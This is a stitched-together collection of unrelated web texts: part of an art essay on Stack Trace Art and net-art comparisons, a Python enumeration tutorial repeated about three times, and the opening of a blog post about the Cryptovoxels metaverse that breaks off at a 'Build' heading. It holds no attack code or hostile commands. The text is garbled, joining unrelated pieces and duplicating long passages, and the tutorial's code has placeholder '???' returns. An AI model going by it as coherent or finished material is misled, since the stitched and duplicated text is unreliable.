This approach, of using the structure of code-based systems for performance, is similar in spirit to projects like PingFS. Even more so, it resembles the project IDN by JODI, which similarly breaks down a sequence into single lines (in this case urls), and uses the location bar of the browser as the place of performance. It similarly splits up the content (even when the content is just a series of redirects) across different sites. It also resembles the project Summer by Olia Lialina, which takes apart a gif and puts each frame onto a different artist's website, to be recombined into an animation in the browser, just as the stack trace recombines function names into a picture.
In both pieces, a single work is broken into segments to be re-assembled through unusual use of an existing technology: in Stack Trace Art (which I'll call STA from here on out), through the IDE itself. Summer emphasizes the filmic quality of the gif, splitting it into individual frames, much as STA splits the individual lines of ASCII art back into lines of text. It's also filmic in that its "projector speed" may speed up or slow down depending on internet connectivity and how quickly it can download each frame from a different site. While both Summer and STA are clever hacks that provide artistic possibilities, the difference in emphasis between the two works serve as a telling contrast between artist and hacker approaches. This is particularly interesting with a hacker piece that's explicitly presented as art, and an artwork by Lialina, who describes herself as a tinkerer, and is very interested in the hobbyist web aesthetic and hacker styling (she wrote this wonderful piece about the Prof. Dr. Style that still dominates some university sites), and claims to not have considered herself an artist until the Dutch Electronic Arts Festival printed the title on her nametag in 1996.
Lialina's approach is more artist-like in the way it packages its idea. Her work is dependent on many artists contributing web space (and web uptime -- any frame going down might cause the animation to freeze). But it is a singular vision of one artist: Lialina produced the individual frames and it is ultimately of her design; the other artists lend material support but they do not re-interpret the work by, say, putting their own image on the swing on one of the frames. The idea is made understandable through its cohesive vision.
Rončević does not even attempt to create the single really cool piece that encapsulates his idea. None of the ASCII art he chose to use in STA is particularly interesting on its own, but chosen to collectively show the potential of using the tool in a variety of 2D textual content. His focus is on on making useful code so that others can easily generate their own version of Stack Trace Art, using his library, or by simply following his example. This is the hacker approach; it's more open-ended, and more openly invites others to run with the idea.
In fact, Rončević seems to doubt that he could really have been the first to have discovered this technique. He has quite a long post asking if others have created something similar, asking if there is a Lobochevski to his Bolyai. Looking past the self-comparison with some of the greatest mathematical minds of the 19th century, the thought is essentially: has really no one else thought to do this weird but really cool thing I've discovered?
It's very possible he was the first (STA is a very cool idea but a very weird way to use code!). The kind of play at work here, misuse of tools to do something entirely new is familiar to both artists and hackers. However, the answer could be that his Lobochevsky doesn't want to be found, and this leads to what I think is the most interesting potential of the work.
Stack traces have a feeling of intimacy between the programmer and a piece of code; it's what's on your screen when you dig deep into a problem to discover the behavior of code and the intentions of the coder behind it (even when that coder is yourself some time ago, with those intentions now forgotten). It's an abstract representation in service of a complex mental process. And I think STA would be best experienced when stumbled onto by accident; a piece of code backfires and you dig into it and suddenly some crazy images, which seem simply impossible to be where they are, suddenly there in the stack trace window, breaking you out of the interface. Here I'm thinking of it as a cousin to work like Joseph Moore's Meaning in Mistakes. It's a weird idea already, and I think gains a lot of power served in an unexpected context.
* Update (9/18/18): While the implementation linked to above is Microsoft-specific, this is an idea that transcends languages. It's also been implemented in node.js by Saša Matijašić.
title: Why You Should Use More Enums In Python description: A gentle introduction to enumerations in Python image: https://florian-dahlitz.de/static/images/blog/why-you-should-use-more-enums-in-python/why-you-should-use-more-enums-in-python-m.jpg
author: Florian Dahlitz description: A gentle introduction to enumerations in Python image: https://florian-dahlitz.de/static/images/blog/why-you-should-use-more-enums-in-python/why-you-should-use-more-enums-in-python-m.jpg title: Why You Should Use More Enums In Python
Table of Contents
Introduction
In this article, you will learn what enums are and how to create and work with them.
Furthermore, you will learn why you should use them more often in your day to day coding.
Note: The code snippets used in the article can be found on GitHub.
What is an enum?
enum stands for enumeration and refers to a set of symbolic names, which are called enumeration members.
These enum members are bound to unique, constant values.
You can iterate over an enumeration and compare its members by identity (Python’s is operator).
The following code snippet shows you a simple example of an enum Colour:
# colour.py
from enum import Enum
class Colour(Enum):
RED = 1
GREEN = 2
BLUE = 3
We imported the Enum class from Python’s enum module.
It serves as a base class for defining new enumerations in Python.
Subsequently, a new enum called Colour is implemented having three enum members: RED, GREEN, and BLUE.
Note: Although the class syntax is used to define new enumerations, they aren’t normal Python classes.
If you want to know more about it, check out the How are Enums different? section in the module’s documentation [1]:
Let’s see how enums behave when used.
# previous colour.py code
c = Colour.RED
print(c)
print(c.name)
print(c.value)
print(c is Colour.RED)
print(c is Colour.BLUE)
We extended the colour.py script by creating a new instance of Colour.RED and assigning it to the variable c.
Furthermore, we print the string representation of Colour.RED, its name and value.
Additionally, we compare c‘s identity with Colour.RED and Colour.BLUE.
$ python colour.py
Colour.RED
RED
1
True
False
Running the script reveals that c is indeed an instance of Colour.RED with RED as its name and 1 as value.
Note: We used the is operator to compare the variable c with the different enum members.
Keep in mind that enums can only be compared to enums and not to integers, even though the enum member values are integers [2].
Iterating over the members of an enum
Enumerations have a special attribute called __members__, which is a read-only ordered mapping of names and members.
Utilising __members__ allows you to iterate over an enum and print the members as well as their corresponding names.
# iterate.py
from enum import Enum
class Colour(Enum):
RED = 1
GREEN = 2
BLUE = 3
for name, member in Colour.__members__.items():
print(name, member)
$ python iterate.py
RED Colour.RED
GREEN Colour.GREEN
BLUE Colour.BLUE
You might ask yourself why we did not something like:
for member in Colour:
print(member.name, member)
For the example at hand, both approaches produce the same result.
However, if you have an enumeration that has aliases, too, only the approach using __members__ will print the aliases as well.
Checkout the following example:
# iterate_alias.py
from enum import Enum
class Colour(Enum):
RED = 1
GREEN = 2
BLUE = 3
ALIAS_RED = 1
for name, member in Colour.__members__.items():
print(name, member)
print("="*20)
for member in Colour:
print(member.name, member)
$ python iterate_alias.py
RED Colour.RED
GREEN Colour.GREEN
BLUE Colour.BLUE
ALIAS_RED Colour.RED
====================
RED Colour.RED
GREEN Colour.GREEN
BLUE Colour.BLUE
Automatic values
In the previous example, we assigned integers to the symbolic names RED, GREEN, and BLUE.
If the exact values are not important, you can use the enum.auto() function.
The function calls _generate_next_value_() internally and generates the values for you.
# auto.py
from enum import auto
from enum import Enum
class Colour(Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
c = Colour.RED
print(c.value)
It chooses a suited value for each enum member, which will (most of the time) be the integers we used before.
$ python auto.py
1
However, the _generate_next_value_() function can be overwritten to generate new values the way you like:
# overwritten_next_values.py
from enum import auto
from enum import Enum
class AutoName(Enum):
def _generate_next_value_(name, start, count, last_values):
if len(last_values) > 0:
return last_values[-1] * 2
return 2
class Colour(AutoName):
RED = auto()
GREEN = auto()
BLUE = auto()
c = Colour.RED
g = Colour.GREEN
b = Colour.BLUE
print(c.value)
print(g.value)
print(b.value)
$ python overwritte_next_values.py
2
4
8
Extending an enum
Being Python classes, enums can have any (special) methods just like all other classes.
Consider the following example.
# extending.py
from enum import Enum
class Colour(Enum):
RED = 1
GREEN = 2
BLUE = 3
def __str__(self):
return self.name
def colorize(self):
return f"Let's paint everything in {self.name.lower()}"
c = Colour.RED
print(c)
print(c.colorize())
We extended the Colour enum by a new method colorize() printing a string generated based on the member’s value.
Furthermore, we overwrite the __str__() dunder method to return the member’s name if called.
$ python extending.py
RED
Let's paint everything in red
Kinds of enums in Python
Besides Enum, Python provides three derived enumerations out of the box:
IntEnum
IntFlag
Flag
We will have a look at all three of them.
Keep in mind that you are free to implement your own derived enumerations based on Enum.
Implementing your own enumeration will not be covered in the article.
IntEnum
We already know that we can compare enum members using Python’s identity operator.
However, the Enum class does not provide ordered comparisons even though integers are used as values for the enumeration members.
Let’s have a look at the following example.
# comparison.py
from enum import Enum
class Colour(Enum):
RED = 1
GREEN = 2
BLUE = 3
r = Colour.RED
b = Colour.GREEN
print(r < b)
Executing the script at hand results in a TypeError.
$ python comparison.py
Traceback (most recent call last):
File "/home/florian/workspace/python/why-you-should-use-more-enums-in-python-article-snippets/comparison.py", line 14, in <module>
print(r < b)
TypeError: '<' not supported between instances of 'Colour' and 'Colour'
The only thing you can do is making use of equality comparisons like == and !=.
Additionally, comparing enum members with any non-enumeration value is not supported.
However, the derived enumeration IntEnumdoes provide ordered comparisons as it is also a subclass of int.
In order to make our example work, we need to import the IntEnum class instead of Enum and derive Colour from it.
We do not need to change anything else.
# comparison.py
from enum import IntEnum
class Colour(IntEnum):
...
$ python comparison.py
True
IntFlag
The IntFlag class is pretty similar to the IntEnum class with the exception that is also supports bitwise operations.
With supporting bitwise operations I mean that it is possible to combine two enum members resulting in an IntFlag member, too.
All other operations on an IntFlag member will result in the loss of the IntFlag membership.
Let’s have a look at an example.
Assume that we grant permissions to users so that they can read, write and/or execute a certain file.
We create an enumeration Permission with the members R (read permission), W (write permission), and X (execute permission) respectively.
If we have a user, who should have read and write permissions for a certain file, we can combine both using the | operator.
# permissions.py
from enum import IntFlag
class Permission(IntFlag):
R = 4
W = 2
X = 1
RW = Permission.R | Permission.W
print(RW)
print(Permission.R + Permission.W)
print(Permission.R in RW)
$ python permissions.py
Permissions.R|W
6
True
Flag
The Flag class does also provide support for bitwise operations but does not inherit from int.
In fact, it is like Enum but with support for the bitwise operations.
If we take the Colour enum from the beginning, we could easily mix the colour white based on the other three colours.
# colour_flag.py
from enum import auto
from enum import Flag
class Colour(Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
WHITE = RED | GREEN | BLUE
print(Colour.WHITE.name, Colour.WHITE.value)
$ python colour_flag.py
WHITE 7
Why do I need enums?
At this point, we have an understanding of what enums are and how we can create them in Python.
Furthermore, we are able to compare and work with them.
However, we still do not know why we need and should use enumerations more often.
The examples we had a look at were pretty simple.
Although the Permission enumeration seems pretty useful, the Colour enum does not.
Why would you use these enumerations in your code?
We defined a function, which takes an HTTPResponse object and returns a string based on the status code of the supplied HTTPResponse object.
You may know that 404 is the status code for Not Found, but do you know the meaning of 502 and 400?
These are only two less known status codes and much more are out there.
It is hard to read and understand the code without a web search.
This is where enumerations come into play.
We can implement our own custom enumeration to lend more meaning to the code.
# http_code_enum.py
from enum import IntEnum
class HTTPCode(IntEnum):
BAD_REQUEST = 400
NOT_FOUND = 404
BAD_GATEWAY = 502
Here an IntEnum is used as we want to be able to compare members of it with integers.
Now, the function from before looks like this:
# response_code.py
from http_code_enum import HTTPCode
from http.client import HTTPResponse
def evaluate_response(response: HTTPResponse) -> str:
if response.code() == HTTPCode.NOT_FOUND:
return "Not Found"
elif response.code() == HTTPCode.BAD_GATEWAY:
return "???"
elif response.code() == HTTPCode.BAD_REQUEST:
return "???"
else:
return "Unknown Status Code"
In essence, if you have magic numbers in your code, you should definitely consider to either assign them to a variable or group them together to an enumeration.
This way your code’s readability increases a lot.
It is especially true if you want to write tests for your code.
Summary
Congratulations, you have made it through the article!
While reading the article you learned what enums are and how you can create them in Python.
Furthermore, you learned how to compare and work with them.
You had a look at a few examples and understood why it is good practice to use enumerations once in a while.
I hope you enjoyed reading the article.
Feel free to share it with your friends and colleagues!
Do you have feedback?
I am eager to hear it!
You can contact me via the contact form or other resources listed in the contact section.
If you have not already, consider following me on Twitter, where I am @DahlitzF, or subscribing to my newsletter!
Stay curious and keep coding!
References
In this article, you will learn what enums are and how to create and work with them.
Furthermore, you will learn why you should use them more often in your day to day coding.
Note: The code snippets used in the article can be found on GitHub.
What is an enum?
enum stands for enumeration and refers to a set of symbolic names, which are called enumeration members.
These enum members are bound to unique, constant values.
You can iterate over an enumeration and compare its members by identity (Python’s is operator).
The following code snippet shows you a simple example of an enum Colour:
# colour.py
from enum import Enum
class Colour(Enum):
RED = 1
GREEN = 2
BLUE = 3
We imported the Enum class from Python’s enum module.
It serves as a base class for defining new enumerations in Python.
Subsequently, a new enum called Colour is implemented having three enum members: RED, GREEN, and BLUE.
Note: Although the class syntax is used to define new enumerations, they aren’t normal Python classes.
If you want to know more about it, check out the How are Enums different? section in the module’s documentation [1]:
Let’s see how enums behave when used.
# previous colour.py code
c = Colour.RED
print(c)
print(c.name)
print(c.value)
print(c is Colour.RED)
print(c is Colour.BLUE)
We extended the colour.py script by creating a new instance of Colour.RED and assigning it to the variable c.
Furthermore, we print the string representation of Colour.RED, its name and value.
Additionally, we compare c‘s identity with Colour.RED and Colour.BLUE.
$ python colour.py
Colour.RED
RED
1
True
False
Running the script reveals that c is indeed an instance of Colour.RED with RED as its name and 1 as value.
Note: We used the is operator to compare the variable c with the different enum members.
Keep in mind that enums can only be compared to enums and not to integers, even though the enum member values are integers [2].
Iterating over the members of an enum
Enumerations have a special attribute called __members__, which is a read-only ordered mapping of names and members.
Utilising __members__ allows you to iterate over an enum and print the members as well as their corresponding names.
# iterate.py
from enum import Enum
class Colour(Enum):
RED = 1
GREEN = 2
BLUE = 3
for name, member in Colour.__members__.items():
print(name, member)
$ python iterate.py
RED Colour.RED
GREEN Colour.GREEN
BLUE Colour.BLUE
You might ask yourself why we did not something like:
for member in Colour:
print(member.name, member)
For the example at hand, both approaches produce the same result.
However, if you have an enumeration that has aliases, too, only the approach using __members__ will print the aliases as well.
Checkout the following example:
# iterate_alias.py
from enum import Enum
class Colour(Enum):
RED = 1
GREEN = 2
BLUE = 3
ALIAS_RED = 1
for name, member in Colour.__members__.items():
print(name, member)
print("="*20)
for member in Colour:
print(member.name, member)
$ python iterate_alias.py
RED Colour.RED
GREEN Colour.GREEN
BLUE Colour.BLUE
ALIAS_RED Colour.RED
====================
RED Colour.RED
GREEN Colour.GREEN
BLUE Colour.BLUE
Automatic values
In the previous example, we assigned integers to the symbolic names RED, GREEN, and BLUE.
If the exact values are not important, you can use the enum.auto() function.
The function calls _generate_next_value_() internally and generates the values for you.
# auto.py
from enum import auto
from enum import Enum
class Colour(Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
c = Colour.RED
print(c.value)
It chooses a suited value for each enum member, which will (most of the time) be the integers we used before.
$ python auto.py
1
However, the _generate_next_value_() function can be overwritten to generate new values the way you like:
# overwritten_next_values.py
from enum import auto
from enum import Enum
class AutoName(Enum):
def _generate_next_value_(name, start, count, last_values):
if len(last_values) > 0:
return last_values[-1] * 2
return 2
class Colour(AutoName):
RED = auto()
GREEN = auto()
BLUE = auto()
c = Colour.RED
g = Colour.GREEN
b = Colour.BLUE
print(c.value)
print(g.value)
print(b.value)
$ python overwritte_next_values.py
2
4
8
Extending an enum
Being Python classes, enums can have any (special) methods just like all other classes.
Consider the following example.
# extending.py
from enum import Enum
class Colour(Enum):
RED = 1
GREEN = 2
BLUE = 3
def __str__(self):
return self.name
def colorize(self):
return f"Let's paint everything in {self.name.lower()}"
c = Colour.RED
print(c)
print(c.colorize())
We extended the Colour enum by a new method colorize() printing a string generated based on the member’s value.
Furthermore, we overwrite the __str__() dunder method to return the member’s name if called.
$ python extending.py
RED
Let's paint everything in red
Kinds of enums in Python
Besides Enum, Python provides three derived enumerations out of the box:
We will have a look at all three of them.
Keep in mind that you are free to implement your own derived enumerations based on Enum.
Implementing your own enumeration will not be covered in the article.
IntEnum
We already know that we can compare enum members using Python’s identity operator.
However, the Enum class does not provide ordered comparisons even though integers are used as values for the enumeration members.
Let’s have a look at the following example.
# comparison.py
from enum import Enum
class Colour(Enum):
RED = 1
GREEN = 2
BLUE = 3
r = Colour.RED
b = Colour.GREEN
print(r < b)
Executing the script at hand results in a TypeError.
$ python comparison.py
Traceback (most recent call last):
File "/home/florian/workspace/python/why-you-should-use-more-enums-in-python-article-snippets/comparison.py", line 14, in <module>
print(r < b)
TypeError: '<' not supported between instances of 'Colour' and 'Colour'
The only thing you can do is making use of equality comparisons like == and !=.
Additionally, comparing enum members with any non-enumeration value is not supported.
However, the derived enumeration IntEnumdoes provide ordered comparisons as it is also a subclass of int.
In order to make our example work, we need to import the IntEnum class instead of Enum and derive Colour from it.
We do not need to change anything else.
# comparison.py
from enum import IntEnum
class Colour(IntEnum):
...
$ python comparison.py
True
IntFlag
The IntFlag class is pretty similar to the IntEnum class with the exception that is also supports bitwise operations.
With supporting bitwise operations I mean that it is possible to combine two enum members resulting in an IntFlag member, too.
All other operations on an IntFlag member will result in the loss of the IntFlag membership.
Let’s have a look at an example.
Assume that we grant permissions to users so that they can read, write and/or execute a certain file.
We create an enumeration Permission with the members R (read permission), W (write permission), and X (execute permission) respectively.
If we have a user, who should have read and write permissions for a certain file, we can combine both using the | operator.
# permissions.py
from enum import IntFlag
class Permission(IntFlag):
R = 4
W = 2
X = 1
RW = Permission.R | Permission.W
print(RW)
print(Permission.R + Permission.W)
print(Permission.R in RW)
$ python permissions.py
Permissions.R|W
6
True
Flag
The Flag class does also provide support for bitwise operations but does not inherit from int.
In fact, it is like Enum but with support for the bitwise operations.
If we take the Colour enum from the beginning, we could easily mix the colour white based on the other three colours.
# colour_flag.py
from enum import auto
from enum import Flag
class Colour(Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
WHITE = RED | GREEN | BLUE
print(Colour.WHITE.name, Colour.WHITE.value)
$ python colour_flag.py
WHITE 7
Why do I need enums?
At this point, we have an understanding of what enums are and how we can create them in Python.
Furthermore, we are able to compare and work with them.
However, we still do not know why we need and should use enumerations more often.
The examples we had a look at were pretty simple.
Although the Permission enumeration seems pretty useful, the Colour enum does not.
Why would you use these enumerations in your code?
We defined a function, which takes an HTTPResponse object and returns a string based on the status code of the supplied HTTPResponse object.
You may know that 404 is the status code for Not Found, but do you know the meaning of 502 and 400?
These are only two less known status codes and much more are out there.
It is hard to read and understand the code without a web search.
This is where enumerations come into play.
We can implement our own custom enumeration to lend more meaning to the code.
# http_code_enum.py
from enum import IntEnum
class HTTPCode(IntEnum):
BAD_REQUEST = 400
NOT_FOUND = 404
BAD_GATEWAY = 502
Here an IntEnum is used as we want to be able to compare members of it with integers.
Now, the function from before looks like this:
# response_code.py
from http_code_enum import HTTPCode
from http.client import HTTPResponse
def evaluate_response(response: HTTPResponse) -> str:
if response.code() == HTTPCode.NOT_FOUND:
return "Not Found"
elif response.code() == HTTPCode.BAD_GATEWAY:
return "???"
elif response.code() == HTTPCode.BAD_REQUEST:
return "???"
else:
return "Unknown Status Code"
In essence, if you have magic numbers in your code, you should definitely consider to either assign them to a variable or group them together to an enumeration.
This way your code’s readability increases a lot.
It is especially true if you want to write tests for your code.
Congratulations, you have made it through the article!
While reading the article you learned what enums are and how you can create them in Python.
Furthermore, you learned how to compare and work with them.
You had a look at a few examples and understood why it is good practice to use enumerations once in a while.
I hope you enjoyed reading the article.
Feel free to share it with your friends and colleagues!
Do you have feedback?
I am eager to hear it!
You can contact me via the contact form or other resources listed in the contact section.
If you have not already, consider following me on Twitter, where I am @DahlitzF, or subscribing to my newsletter!
Stay curious and keep coding!
In this article, you will learn what enums are and how to create and work with them.
Furthermore, you will learn why you should use them more often in your day to day coding.
Note: The code snippets used in the article can be found on GitHub.
What is an enum?
enum stands for enumeration and refers to a set of symbolic names, which are called enumeration members.
These enum members are bound to unique, constant values.
You can iterate over an enumeration and compare its members by identity (Python’s is operator).
The following code snippet shows you a simple example of an enum Colour:
# colour.py
from enum import Enum
class Colour(Enum):
RED = 1
GREEN = 2
BLUE = 3
We imported the Enum class from Python’s enum module.
It serves as a base class for defining new enumerations in Python.
Subsequently, a new enum called Colour is implemented having three enum members: RED, GREEN, and BLUE.
Note: Although the class syntax is used to define new enumerations, they aren’t normal Python classes.
If you want to know more about it, check out the How are Enums different? section in the module’s documentation [1]:
Let’s see how enums behave when used.
# previous colour.py code
c = Colour.RED
print(c)
print(c.name)
print(c.value)
print(c is Colour.RED)
print(c is Colour.BLUE)
We extended the colour.py script by creating a new instance of Colour.RED and assigning it to the variable c.
Furthermore, we print the string representation of Colour.RED, its name and value.
Additionally, we compare c‘s identity with Colour.RED and Colour.BLUE.
$ python colour.py
Colour.RED
RED
1
True
False
Running the script reveals that c is indeed an instance of Colour.RED with RED as its name and 1 as value.
Note: We used the is operator to compare the variable c with the different enum members.
Keep in mind that enums can only be compared to enums and not to integers, even though the enum member values are integers [2].
Iterating over the members of an enum
Enumerations have a special attribute called __members__, which is a read-only ordered mapping of names and members.
Utilising __members__ allows you to iterate over an enum and print the members as well as their corresponding names.
# iterate.py
from enum import Enum
class Colour(Enum):
RED = 1
GREEN = 2
BLUE = 3
for name, member in Colour.__members__.items():
print(name, member)
$ python iterate.py
RED Colour.RED
GREEN Colour.GREEN
BLUE Colour.BLUE
You might ask yourself why we did not something like:
for member in Colour:
print(member.name, member)
For the example at hand, both approaches produce the same result.
However, if you have an enumeration that has aliases, too, only the approach using __members__ will print the aliases as well.
Checkout the following example:
# iterate_alias.py
from enum import Enum
class Colour(Enum):
RED = 1
GREEN = 2
BLUE = 3
ALIAS_RED = 1
for name, member in Colour.__members__.items():
print(name, member)
print("="*20)
for member in Colour:
print(member.name, member)
$ python iterate_alias.py
RED Colour.RED
GREEN Colour.GREEN
BLUE Colour.BLUE
ALIAS_RED Colour.RED
====================
RED Colour.RED
GREEN Colour.GREEN
BLUE Colour.BLUE
Automatic values
In the previous example, we assigned integers to the symbolic names RED, GREEN, and BLUE.
If the exact values are not important, you can use the enum.auto() function.
The function calls _generate_next_value_() internally and generates the values for you.
# auto.py
from enum import auto
from enum import Enum
class Colour(Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
c = Colour.RED
print(c.value)
It chooses a suited value for each enum member, which will (most of the time) be the integers we used before.
$ python auto.py
1
However, the _generate_next_value_() function can be overwritten to generate new values the way you like:
# overwritten_next_values.py
from enum import auto
from enum import Enum
class AutoName(Enum):
def _generate_next_value_(name, start, count, last_values):
if len(last_values) > 0:
return last_values[-1] * 2
return 2
class Colour(AutoName):
RED = auto()
GREEN = auto()
BLUE = auto()
c = Colour.RED
g = Colour.GREEN
b = Colour.BLUE
print(c.value)
print(g.value)
print(b.value)
$ python overwritte_next_values.py
2
4
8
Extending an enum
Being Python classes, enums can have any (special) methods just like all other classes.
Consider the following example.
# extending.py
from enum import Enum
class Colour(Enum):
RED = 1
GREEN = 2
BLUE = 3
def __str__(self):
return self.name
def colorize(self):
return f"Let's paint everything in {self.name.lower()}"
c = Colour.RED
print(c)
print(c.colorize())
We extended the Colour enum by a new method colorize() printing a string generated based on the member’s value.
Furthermore, we overwrite the __str__() dunder method to return the member’s name if called.
$ python extending.py
RED
Let's paint everything in red
Kinds of enums in Python
Besides Enum, Python provides three derived enumerations out of the box:
IntEnum
IntFlag
Flag
We will have a look at all three of them.
Keep in mind that you are free to implement your own derived enumerations based on Enum.
Implementing your own enumeration will not be covered in the article.
IntEnum
We already know that we can compare enum members using Python’s identity operator.
However, the Enum class does not provide ordered comparisons even though integers are used as values for the enumeration members.
Let’s have a look at the following example.
# comparison.py
from enum import Enum
class Colour(Enum):
RED = 1
GREEN = 2
BLUE = 3
r = Colour.RED
b = Colour.GREEN
print(r < b)
Executing the script at hand results in a TypeError.
$ python comparison.py
Traceback (most recent call last):
File "/home/florian/workspace/python/why-you-should-use-more-enums-in-python-article-snippets/comparison.py", line 14, in <module>
print(r < b)
TypeError: '<' not supported between instances of 'Colour' and 'Colour'
The only thing you can do is making use of equality comparisons like == and !=.
Additionally, comparing enum members with any non-enumeration value is not supported.
However, the derived enumeration IntEnumdoes provide ordered comparisons as it is also a subclass of int.
In order to make our example work, we need to import the IntEnum class instead of Enum and derive Colour from it.
We do not need to change anything else.
# comparison.py
from enum import IntEnum
class Colour(IntEnum):
...
$ python comparison.py
True
IntFlag
The IntFlag class is pretty similar to the IntEnum class with the exception that is also supports bitwise operations.
With supporting bitwise operations I mean that it is possible to combine two enum members resulting in an IntFlag member, too.
All other operations on an IntFlag member will result in the loss of the IntFlag membership.
Let’s have a look at an example.
Assume that we grant permissions to users so that they can read, write and/or execute a certain file.
We create an enumeration Permission with the members R (read permission), W (write permission), and X (execute permission) respectively.
If we have a user, who should have read and write permissions for a certain file, we can combine both using the | operator.
# permissions.py
from enum import IntFlag
class Permission(IntFlag):
R = 4
W = 2
X = 1
RW = Permission.R | Permission.W
print(RW)
print(Permission.R + Permission.W)
print(Permission.R in RW)
$ python permissions.py
Permissions.R|W
6
True
Flag
The Flag class does also provide support for bitwise operations but does not inherit from int.
In fact, it is like Enum but with support for the bitwise operations.
If we take the Colour enum from the beginning, we could easily mix the colour white based on the other three colours.
# colour_flag.py
from enum import auto
from enum import Flag
class Colour(Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
WHITE = RED | GREEN | BLUE
print(Colour.WHITE.name, Colour.WHITE.value)
$ python colour_flag.py
WHITE 7
Why do I need enums?
At this point, we have an understanding of what enums are and how we can create them in Python.
Furthermore, we are able to compare and work with them.
However, we still do not know why we need and should use enumerations more often.
The examples we had a look at were pretty simple.
Although the Permission enumeration seems pretty useful, the Colour enum does not.
Why would you use these enumerations in your code?
We defined a function, which takes an HTTPResponse object and returns a string based on the status code of the supplied HTTPResponse object.
You may know that 404 is the status code for Not Found, but do you know the meaning of 502 and 400?
These are only two less known status codes and much more are out there.
It is hard to read and understand the code without a web search.
This is where enumerations come into play.
We can implement our own custom enumeration to lend more meaning to the code.
# http_code_enum.py
from enum import IntEnum
class HTTPCode(IntEnum):
BAD_REQUEST = 400
NOT_FOUND = 404
BAD_GATEWAY = 502
Here an IntEnum is used as we want to be able to compare members of it with integers.
Now, the function from before looks like this:
# response_code.py
from http_code_enum import HTTPCode
from http.client import HTTPResponse
def evaluate_response(response: HTTPResponse) -> str:
if response.code() == HTTPCode.NOT_FOUND:
return "Not Found"
elif response.code() == HTTPCode.BAD_GATEWAY:
return "???"
elif response.code() == HTTPCode.BAD_REQUEST:
return "???"
else:
return "Unknown Status Code"
In essence, if you have magic numbers in your code, you should definitely consider to either assign them to a variable or group them together to an enumeration.
This way your code’s readability increases a lot.
It is especially true if you want to write tests for your code.
Summary
Congratulations, you have made it through the article!
While reading the article you learned what enums are and how you can create them in Python.
Furthermore, you learned how to compare and work with them.
You had a look at a few examples and understood why it is good practice to use enumerations once in a while.
I hope you enjoyed reading the article.
Feel free to share it with your friends and colleagues!
Do you have feedback?
I am eager to hear it!
You can contact me via the contact form or other resources listed in the contact section.
If you have not already, consider following me on Twitter, where I am @DahlitzF, or subscribing to my newsletter!
Stay curious and keep coding!
title: A Look at Cryptovoxels description: The Metaverse Being Built on Ethereum image: https://fragosti.com/assets/img/cv-ready-player-one.jpg
author: Francesco Agosti description: The Metaverse Being Built on Ethereum image: https://fragosti.com/assets/img/cv-ready-player-one.jpg title: A Look at Cryptovoxels
The term “Metaverse” was originally coined by Neal Stephenson in his 1992 novel Snow Crash. In the Metaverse humans, as avatars, interact with each other and software agents, in a three-dimensional space that uses the metaphor of the real world. Stephenson used the term to describe a virtual reality-based successor to the Internet.
A more recent rendition of the Metaverse can be seen in the movie Ready Player One, where it is called “The OASIS”.
What is Cryptovoxels?
Cryptovoxels is a Metaverse that runs in your browser (and phone, and VR headset). It uses the Ethereum blockchain to track ownership of goods in its economy, most importantly property. It has come a long way since the original trailer (above) was released.
Cryptovoxels is a virtual world powered by the Ethereum blockchain. Players can buy land and build stores and art galleries. Editing tools, avatars, text chat and voice chat are built in. — cryptovoxels.com
There are other similar projects on Ethereum, such as Decentraland and The Sandbox, but this post will focus on Cryptovoxels.
Why Ethereum?
From an implementation standpoint, there is no reason you technically need a blockchain to build a Metaverse. In fact, building Cryptovoxels on Ethereum likely came with its unique set of challenges.
However, building on Ethereum also comes with some unique advantages. For one, it just fits the ethos. In Ready Player One the OASIS becomes so important that the company running it becomes one of the most valuable in the world. In fact, the OASIS is so valuable that the central conflict of the movie is about who owns and controls it.
Having Cryptovoxel parcel ownership be tracked on Ethereum provides users with strong guarantees that their assets cannot simply be taken away by the creators. While it is true that the entire game isn’t decentralized, and that the creators could change the game to ignore what Ethereum says, the fact that it is built on Ethereum shows a commitment to letting the users own the world.
This commitment has allowed Cryptovoxels to attract the right kind of early adopters, who have taken ownership of the world in their own right. More specifically, it has attracted designers, painters, modeling experts, architects, digital artists, etc…. These artists have done an amazing job in building out the world and making it a place worth exploring and hanging out in.
Finally, there is at least one more tangible advantage to building a Metaverse on Ethereum: existing assets and infrastructure. The Cryptovoxel world is highly compatible with the rest of the Ethereum ecosystem, especially the ERC-721 standard (also known as Non-Fungible Tokens).
Many users already own NFTs (such as CryptoKitties), and will see Cryptovoxels as a perfect place to display and sell them. Cryptovoxel parcels are also NFTs, and so are compatible with existing exchange infrastructure, which means the creators of Cryptovoxels never had to build an exchange to let their users trade parcels.
What can you do?
While Cryptovoxels feels like a game, it is just an open world. There are no clear objectives. You do whatever you want.
Explore
One of the best things to do in Cryptovoxels is to wander around. Every time I explore, I find something new and surprising.
You can see that the map displays a few islands and neighborhoods, such as “Proxima” or “Moon”. At the time of writing, there are 31 neighborhoods and 4 islands, although more are coming online every week.
Each neighborhood has its unique look-and-feel. In Area 51, you’ll see a lot of alien themed content, and in Kitties, you’ll see a lot of references to and collectibles from the CryptoKitties game. Neighborhood building restrictions come into play as well, as some neighborhoods such as Frankfurt allow for taller buildings and therefore have a big city vibe.
Of course, neighborhoods are just composed of individual parcels with unique owners and unique builds — some more impressive than others. Take the DAI House for example, which is a tribute to the DAI cryptocurrency and boasts fountains and spinning 3DDAI models. Another example is the Token Smart Amphitheatre, which displays some impressive architecture and even a cafe, or Sugar Club where people go to listen to music and dance (yes, there is a dance button).
There are also quite a few personalities and magnates in Cryptovoxels, who are responsible for building and advertising some of the biggest builds and events. Artist, architect and “Photoshop Priest” Alotta Money recently advertised the opening party for the Voxel Hotel, which has to be the most impressive build I’ve seen in Cryptovoxels so far.
In fact, as recently as yesterday, people have been gathering at the Voxel Hotel and elsewhere for legitimate meet-ups and events. Many of these meet-ups are well organized and have considerable thought put into them.
There are plenty of secrets to discover as well, as some of the best builds and experiences are hidden away. If you check out EtherBrews it appears to be a simple brewery on the water, but if you go inside and fly over the wall, you’ll find a beautiful tree. Some builds are straight up puzzles, like Yours Truly Puzzle (can you get in?). Finally, you may even find games like Breakout appear on random corners of the world since better scripting functionality has been added.
The above only scratches the surface of what you can explore in Cryptovoxels. You can watch live events as Cryptovoxels supports YouTube embeds and Twitch streams, you can go shopping (more on that later) and even pray in a virtual church if that’s your thing.
Build
